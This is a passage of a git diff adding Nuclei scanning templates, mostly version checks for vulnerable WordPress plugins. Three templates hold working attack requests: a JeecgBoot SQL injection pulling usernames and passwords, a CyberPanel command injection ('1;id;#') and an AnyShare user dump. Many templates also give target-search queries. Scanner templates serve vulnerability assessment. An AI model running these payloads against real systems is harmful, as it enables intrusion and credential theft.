cve,wordpress,wp-plugin,poll-wp,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/poll-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "poll-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9111-581fc93879c1c54ef26503d9dcc6ddcf.yaml b/poc/cve/CVE-2024-9111-581fc93879c1c54ef26503d9dcc6ddcf.yaml new file mode 100644 index 0000000000..916ae210bf --- /dev/null +++ b/poc/cve/CVE-2024-9111-581fc93879c1c54ef26503d9dcc6ddcf.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9111-581fc93879c1c54ef26503d9dcc6ddcf + +info: + name: > + Product Designer <= 1.0.36 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.36 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/28126b4f-1cb6-4e91-b1c0-09f407d1dbf8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9111 + metadata: + fofa-query: "wp-content/plugins/product-designer/" + google-query: inurl:"/wp-content/plugins/product-designer/" + shodan-query: 'vuln:CVE-2024-9111' + tags: cve,wordpress,wp-plugin,product-designer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/product-designer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "product-designer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.36') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9290.yaml b/poc/cve/CVE-2024-9290.yaml new file mode 100644 index 0000000000..54696e69d9 --- /dev/null +++ b/poc/cve/CVE-2024-9290.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9290-5dcc80904918d747de269b21d040c79c + +info: + name: > + Super Backup & Clone - Migrate for WordPress <= 2.3.3 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + The Super Backup & Clone - Migrate for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and a missing capability check on the ibk_restore_migrate_check() function in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9290 + metadata: + fofa-query: "wp-content/plugins/indeed-wp-superbackup/" + google-query: inurl:"/wp-content/plugins/indeed-wp-superbackup/" + shodan-query: 'vuln:CVE-2024-9290' + tags: cve,wordpress,wp-plugin,indeed-wp-superbackup,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-wp-superbackup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-wp-superbackup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9422.yaml b/poc/cve/CVE-2024-9422.yaml new file mode 100644 index 0000000000..e326b659dd --- /dev/null +++ b/poc/cve/CVE-2024-9422.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9422-36832b91d82ec54ad53a0608240202ac + +info: + name: > + GEO My WordPress <= 4.4.0.2 - Authenticated (Admin+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The GEO My WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in versions up to, and including 4.4.0.2 (or version up to 3.1 for premium). This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8214cdd-3a7d-40ce-9645-7dbd6e8f037f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-9422 + metadata: + fofa-query: "wp-content/plugins/gmw-premium-settings/" + google-query: inurl:"/wp-content/plugins/gmw-premium-settings/" + shodan-query: 'vuln:CVE-2024-9422' + tags: cve,wordpress,wp-plugin,gmw-premium-settings,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gmw-premium-settings/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gmw-premium-settings" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 3.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9428.yaml b/poc/cve/CVE-2024-9428.yaml new file mode 100644 index 0000000000..9989ee966f --- /dev/null +++ b/poc/cve/CVE-2024-9428.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9428-c09d51632b50b1241638d75cbef69a48 + +info: + name: > + Popup Builder <= 4.3.4 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Popup Builder – Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e5a29d8-f40e-4711-aaae-1aa01ebd11fe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-9428 + metadata: + fofa-query: "wp-content/plugins/popup-builder/" + google-query: inurl:"/wp-content/plugins/popup-builder/" + shodan-query: 'vuln:CVE-2024-9428' + tags: cve,wordpress,wp-plugin,popup-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "popup-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9608.yaml b/poc/cve/CVE-2024-9608.yaml new file mode 100644 index 0000000000..a9cdb42026 --- /dev/null +++ b/poc/cve/CVE-2024-9608.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9608-43ae0e925e1e1d7237870fbf4dcc9527 + +info: + name: > + MyParcel <= 4.24.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The MyParcel plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.24.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Please note this is only exploitable when the WooCommerce store is set to Belgium. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6c85f2b-965d-477f-9d9a-4a3f315c4904?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9608 + metadata: + fofa-query: "wp-content/plugins/woocommerce-myparcel/" + google-query: inurl:"/wp-content/plugins/woocommerce-myparcel/" + shodan-query: 'vuln:CVE-2024-9608' + tags: cve,wordpress,wp-plugin,woocommerce-myparcel,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-myparcel/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-myparcel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.24.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9651.yaml b/poc/cve/CVE-2024-9651.yaml new file mode 100644 index 0000000000..48fbb421e4 --- /dev/null +++ b/poc/cve/CVE-2024-9651.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9651-22705fcb7e0d7ad90586a2952ccaeadc + +info: + name: > + Fluent Forms <= 5.2.0 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 5.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ca329b94-1d4c-439c-b45a-6b39ccf3d1eb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-9651 + metadata: + fofa-query: "wp-content/plugins/fluentform/" + google-query: inurl:"/wp-content/plugins/fluentform/" + shodan-query: 'vuln:CVE-2024-9651' + tags: cve,wordpress,wp-plugin,fluentform,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fluentform" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml b/poc/cve/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml new file mode 100644 index 0000000000..645549d8ce --- /dev/null +++ b/poc/cve/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6 + +info: + name: > + Crafthemes Demo Import <= 3.3 - Authenticated (Admin+) Arbitrary File Upload in process_uploaded_files + author: topscoder + severity: low + description: > + The Crafthemes Demo Import plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'process_uploaded_files' function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e44dd0e8-e6e7-4a2d-b9ca-abd1de273092?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-9698 + metadata: + fofa-query: "wp-content/plugins/crafthemes-demo-import/" + google-query: inurl:"/wp-content/plugins/crafthemes-demo-import/" + shodan-query: 'vuln:CVE-2024-9698' + tags: cve,wordpress,wp-plugin,crafthemes-demo-import,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/crafthemes-demo-import/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "crafthemes-demo-import" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9768.yaml b/poc/cve/CVE-2024-9768.yaml new file mode 100644 index 0000000000..5db87f9b90 --- /dev/null +++ b/poc/cve/CVE-2024-9768.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9768-30f7e3c972d3515da9f5d833ce52d040 + +info: + name: > + Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder <= 6.14 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0f93f3c4-555c-4fb5-b4ad-b03cdba82fb8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-9768 + metadata: + fofa-query: "wp-content/plugins/formidable/" + google-query: inurl:"/wp-content/plugins/formidable/" + shodan-query: 'vuln:CVE-2024-9768' + tags: cve,wordpress,wp-plugin,formidable,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/formidable/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "formidable" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9828.yaml b/poc/cve/CVE-2024-9828.yaml new file mode 100644 index 0000000000..e2e6e4c7f6 --- /dev/null +++ b/poc/cve/CVE-2024-9828.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9828-b109b777c27d6b8c5c2052777f0757de + +info: + name: > + Taskbuilder – WordPress Project & Task Management plugin <= 3.0.4 - Authenticated (Admin+) SQL injection + author: topscoder + severity: low + description: > + The Taskbuilder – WordPress Project & Task Management plugin plugin for WordPress is vulnerable to SQL Injection via the 'load_orders' parameter in all versions up to, and including, 3.0.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9c7aeef5-b87e-4cd0-9374-93b7f67a9187?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-9828 + metadata: + fofa-query: "wp-content/plugins/taskbuilder/" + google-query: inurl:"/wp-content/plugins/taskbuilder/" + shodan-query: 'vuln:CVE-2024-9828' + tags: cve,wordpress,wp-plugin,taskbuilder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/taskbuilder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "taskbuilder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9835.yaml b/poc/cve/CVE-2024-9835.yaml new file mode 100644 index 0000000000..4ea6f5a7d0 --- /dev/null +++ b/poc/cve/CVE-2024-9835.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9835-38ca210b0204cafbf6f8c2b60a4a2cb6 + +info: + name: > + RSS Feed Widget <= 3.0.0 - Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] + author: topscoder + severity: medium + description: > + The RSS Feed Widget plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cbd6a4ee-49ea-4008-83ac-1a3c3ccdd4d4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9835 + metadata: + fofa-query: "wp-content/plugins/rss-feed-widget/" + google-query: inurl:"/wp-content/plugins/rss-feed-widget/" + shodan-query: 'vuln:CVE-2024-9835' + tags: cve,wordpress,wp-plugin,rss-feed-widget,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rss-feed-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rss-feed-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9836.yaml b/poc/cve/CVE-2024-9836.yaml new file mode 100644 index 0000000000..089b864a94 --- /dev/null +++ b/poc/cve/CVE-2024-9836.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9836-30a0c883d6baf4f6567157334592361c + +info: + name: > + RSS Feed Widget <= 2.9.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The RSS Feed Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rfw-youtube-videos' shortcode in all versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/da3b8de2-f620-40a7-a44a-c4fcb6d57d8c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9836 + metadata: + fofa-query: "wp-content/plugins/rss-feed-widget/" + google-query: inurl:"/wp-content/plugins/rss-feed-widget/" + shodan-query: 'vuln:CVE-2024-9836' + tags: cve,wordpress,wp-plugin,rss-feed-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rss-feed-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rss-feed-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9934.yaml b/poc/cve/CVE-2024-9934.yaml new file mode 100644 index 0000000000..5e3f7d06fd --- /dev/null +++ b/poc/cve/CVE-2024-9934.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9934-5ae7ef68155780d5697b9e643131dccb + +info: + name: > + Wp-ImageZoom <= 1.1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Wp-ImageZoom plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4764fe2-7bdf-4b08-ae9f-ccb46929c50a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9934 + metadata: + fofa-query: "wp-content/plugins/wp-imagezoom/" + google-query: inurl:"/wp-content/plugins/wp-imagezoom/" + shodan-query: 'vuln:CVE-2024-9934' + tags: cve,wordpress,wp-plugin,wp-imagezoom,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-imagezoom/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-imagezoom" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/cve/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml b/poc/cve/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml new file mode 100644 index 0000000000..fb0e831cf5 --- /dev/null +++ b/poc/cve/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml @@ -0,0 +1,23 @@ +id: jeecg-boot-getTotalData-sqli-CVE-2024-48307 + +info: + name: jeecg-boot-getTotalData-sqli-CVE-2024-48307 + author: PokerSec + severity: high + metadata: + fofasearch: app="JeecgBoot-企业级低代码平台" || body="/_app.config.js?v=3.7.1" + +http: + - raw: + - |- + POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(username,0x3a,password)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}} + + matchers: + - type: dsl + condition: and + dsl: + - status_code==200 && contains_all(body,"chartData") && contains_all(body,"concat(username") && contains_all(body,"yAxisIndex") \ No newline at end of file diff --git a/poc/detect/adbuddy-adblocker-detection.yaml b/poc/detect/adbuddy-adblocker-detection.yaml new file mode 100644 index 0000000000..ef8c6f2261 --- /dev/null +++ b/poc/detect/adbuddy-adblocker-detection.yaml @@ -0,0 +1,59 @@ +id: adbuddy-adblocker-detection-3bb46498f1afb79669fda4714744548d + +info: + name: > + adBuddy+ (AdBlocker Detection) by NetfunkDesign <= 1.1.3 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fd0a887-db61-4b2d-af52-ec1d9c525663?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/adbuddy-adblocker-detection/" + google-query: inurl:"/wp-content/plugins/adbuddy-adblocker-detection/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,adbuddy-adblocker-detection,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/adbuddy-adblocker-detection/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "adbuddy-adblocker-detection" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.3') \ No newline at end of file diff --git a/poc/microsoft/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml b/poc/microsoft/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml new file mode 100644 index 0000000000..5396874e7a --- /dev/null +++ b/poc/microsoft/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml @@ -0,0 +1,59 @@ +id: ims-countdown-afc1b693115a4259c31be875ae4878db + +info: + name: > + IMS Countdown <= 1.3.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2de22728-4f67-406c-9db5-33cbba4c15eb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ims-countdown/" + google-query: inurl:"/wp-content/plugins/ims-countdown/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ims-countdown,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ims-countdown/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ims-countdown" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.4') \ No newline at end of file diff --git a/poc/mysql/cyberpanel-upgrademysqlstatus-rce.yaml b/poc/mysql/cyberpanel-upgrademysqlstatus-rce.yaml new file mode 100644 index 0000000000..9527fa8bbe --- /dev/null +++ b/poc/mysql/cyberpanel-upgrademysqlstatus-rce.yaml @@ -0,0 +1,24 @@ +id: cyberpanel-upgrademysqlstatus-rce + +info: + name: cyberpanel-upgrademysqlstatus-rce + author: PokerSec + severity: critical + metadata: + fofasearch: app="CyberPanel" + +http: + - raw: + - | + GET /dataBases/upgrademysqlstatus HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 + Content-Type: application/json + Connection: close + + {"statusfile":"1;id;#"} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"uid=") && contains_all(body,"gid=") \ No newline at end of file diff --git a/poc/other/AnyShare-Usrm_GetAllUsers-infoleak.yaml b/poc/other/AnyShare-Usrm_GetAllUsers-infoleak.yaml new file mode 100644 index 0000000000..a196935599 --- /dev/null +++ b/poc/other/AnyShare-Usrm_GetAllUsers-infoleak.yaml @@ -0,0 +1,21 @@ +id: AnyShare-Usrm_GetAllUsers-infoleak + +info: + name: AnyShare-Usrm_GetAllUsers-infoleak + author: PokerSec + severity: high + metadata: + fofasearch: app="AISHU-AnyShare" + +http: + - raw: + - | + POST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1 + Host: {{Hostname}} + + [1,100] + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"password") && contains_all(body,"departmentNames") \ No newline at end of file diff --git a/poc/other/abcbiz-addons.yaml b/poc/other/abcbiz-addons.yaml new file mode 100644 index 0000000000..ae65e436e6 --- /dev/null +++ b/poc/other/abcbiz-addons.yaml @@ -0,0 +1,59 @@ +id: abcbiz-addons-f574e93c5fcb8829799acb29890991b0 + +info: + name: > + ABCBiz Addons for Elementor <= 2.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/688c04b5-e5fe-4ddf-b253-2418149d9aba?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/abcbiz-addons/" + google-query: inurl:"/wp-content/plugins/abcbiz-addons/" + shodan-query: 'vuln:' + tags: 